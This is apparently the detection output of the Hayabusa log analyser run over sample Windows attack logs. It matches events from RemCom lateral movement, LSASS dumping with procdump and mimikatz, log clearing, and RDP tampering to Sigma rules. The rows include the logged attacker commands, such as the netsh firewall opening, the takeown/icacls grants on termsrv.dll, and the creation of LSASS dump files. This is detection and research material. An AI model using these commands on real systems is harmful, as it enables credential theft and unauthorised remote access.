365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 
10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 
0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 
0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly 
Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 
+09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src 
Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 
365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: 
""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 
365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: 
C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions 
Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 
